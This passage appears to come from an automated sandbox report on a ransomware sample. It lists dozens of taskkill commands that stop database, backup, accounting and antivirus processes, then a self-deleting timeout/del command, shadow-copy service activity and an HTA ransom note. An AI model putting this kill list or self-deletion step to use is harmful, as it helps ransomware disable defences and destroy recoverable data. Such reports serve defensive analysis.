  cmd /C taskkill /F /T /IM mysql*
  2⤵
  PID:1764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM mysql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:792
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wxServerView*
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wxServerView*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlmangr*
  2⤵
  PID:1868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlmangr*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1860
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM RAgui*
  2⤵
  PID:452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM RAgui*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:460
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM supervise*
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM supervise*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:612
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Culture*
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Culture*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Defwatch*
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Defwatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM winword*
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM winword*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBW32*
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBW32*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgr*
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBDBMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM qbupdate*
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM qbupdate*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:340
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM axlbridge*
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM axlbridge*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM httpd*
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM httpd*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fdlauncher*
  2⤵
  PID:516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fdlauncher*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1348
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MsDtSrvr*
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MsDtSrvr*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM java*
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM java*
    3⤵
    - Kills process with taskkill
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM 360se*
  2⤵
  PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM 360se*
    3⤵
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM 360doctor*
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM 360doctor*
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wdswfsafe*
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wdswfsafe*
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fdhost*
  2⤵
  PID:300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fdhost*
    3⤵
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM GDscan*
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM GDscan*
    3⤵
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ZhuDongFangYu*
  2⤵
  PID:1852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ZhuDongFangYu*
    3⤵
    - Kills process with taskkill
    PID:1756
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgrN*
  2⤵
  PID:1360
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBDBMgrN*
    3⤵
    - Kills process with taskkill
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM mysqld*
  2⤵
  PID:560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM mysqld*
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AutodeskDesktopApp*
  2⤵
  PID:324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AutodeskDesktopApp*
    3⤵
    - Kills process with taskkill
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM acwebbrowser*
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM acwebbrowser*
    3⤵
    - Kills process with taskkill
    PID:1556
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Creative Cloud*
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Creative Cloud*
    3⤵
    PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Adobe Desktop Service*
  2⤵
  PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Adobe Desktop Service*
    3⤵
    PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM CoreSync*
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM CoreSync*
    3⤵
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Adobe CEF Helper*
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Adobe CEF Helper*
    3⤵
    - Kills process with taskkill
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM node*
  2⤵
  PID:1052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM node*
    3⤵
    - Kills process with taskkill
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AdobeIPCBroker*
  2⤵
  PID:780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AdobeIPCBroker*
    3⤵
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sync-taskbar*
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sync-taskbar*
    3⤵
    PID:1756
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sync-worker*
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sync-worker*
    3⤵
    - Kills process with taskkill
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM InputPersonalization*
  2⤵
  PID:516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM InputPersonalization*
    3⤵
    - Kills process with taskkill
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AdobeCollabSync*
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AdobeCollabSync*
    3⤵
    - Kills process with taskkill
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM BrCtrlCntr*
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM BrCtrlCntr*
    3⤵
    - Kills process with taskkill
    PID:1556
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM BrCcUxSys*
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM BrCcUxSys*
    3⤵
    - Kills process with taskkill
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SimplyConnectionManager*
  2⤵
  PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SimplyConnectionManager*
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
  2⤵
  PID:1180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Simply.SystemTrayIcon*
    3⤵
    - Kills process with taskkill
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fbguard*
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fbguard*
    3⤵
    - Kills process with taskkill
    PID:740
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fbserver*
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fbserver*
    3⤵
    - Kills process with taskkill
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ONENOTEM*
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ONENOTEM*
    3⤵
    - Kills process with taskkill
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wrapper*
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wrapper*
    3⤵
    - Kills process with taskkill
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM DefWatch*
  2⤵
  PID:1344
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM DefWatch*
    3⤵
    - Kills process with taskkill
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ccEvtMgr*
  2⤵
  PID:328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ccEvtMgr*
    3⤵
    PID:324
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ccSetMgr*
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ccSetMgr*
    3⤵
    - Kills process with taskkill
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SavRoam*
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SavRoam*
    3⤵
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Sqlservr*
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Sqlservr*
    3⤵
    - Kills process with taskkill
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlagent*
  2⤵
  PID:980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlagent*
    3⤵
    - Kills process with taskkill
    PID:1252
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqladhlp*
  2⤵
  PID:340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqladhlp*
    3⤵
    - Kills process with taskkill
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Culserver*
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Culserver*
    3⤵
    PID:780
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM RTVscan*
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM RTVscan*
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlbrowser*
  2⤵
  PID:1860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlbrowser*
    3⤵
    - Kills process with taskkill
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLADHLP*
  2⤵
  PID:1396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLADHLP*
    3⤵
    - Kills process with taskkill
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBIDPService*
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBIDPService*
    3⤵
    PID:1200
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBCFMonitorService*
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlwriter*
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlwriter*
    3⤵
    - Kills process with taskkill
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM msmdsrv*
  2⤵
  PID:728
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM msmdsrv*
    3⤵
    - Kills process with taskkill
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM tomcat6*
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM tomcat6*
    3⤵
    - Kills process with taskkill
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM zhudongfangyu*
  2⤵
  PID:860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:792
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM vmware-usbarbitator64*
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM vmware-usbarbitator64*
    3⤵
    - Kills process with taskkill
    PID:508
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM vmware-converter*
  2⤵
  PID:268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM vmware-converter*
    3⤵
    - Kills process with taskkill
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM dbsrv12*
  2⤵
  PID:716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM dbsrv12*
    3⤵
    - Kills process with taskkill
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM dbeng8*
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM dbeng8*
    3⤵
    - Kills process with taskkill
    PID:612
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:1552
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
  2⤵
  PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    3⤵
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLBrowser*
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLBrowser*
    3⤵
    - Kills process with taskkill
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLWriter*
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLWriter*
    3⤵
    - Kills process with taskkill
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM FishbowlMySQL*
  2⤵
  PID:572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM FishbowlMySQL*
    3⤵
    - Kills process with taskkill
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MySQL57*
  2⤵
  PID:1348
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MySQL57*
    3⤵
    - Kills process with taskkill
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLServerADHelper100*
    3⤵
    - Kills process with taskkill
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
  2⤵
  PID:784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
    3⤵
    - Kills process with taskkill
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM msftesql-Exchange*
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM msftesql-Exchange*
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
    3⤵
    - Kills process with taskkill
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
  2⤵
  PID:1252
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$SBSMONITORING*
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
  2⤵
  PID:1500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
  2⤵
  PID:780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:508
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
  2⤵
  PID:664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:1588
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell [System.Net.Dns]::GetHostByAddress('10.7.0.166').hostname
  2⤵
  PID:1948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x32.crypt.bin.exe" /F
  2⤵
  - Deletes itself
  PID:2024
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 15 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:1072

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\Desktop\ntIpgn-decrypt.hta"
1⤵
- Modifies Internet Explorer settings
PID:1396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads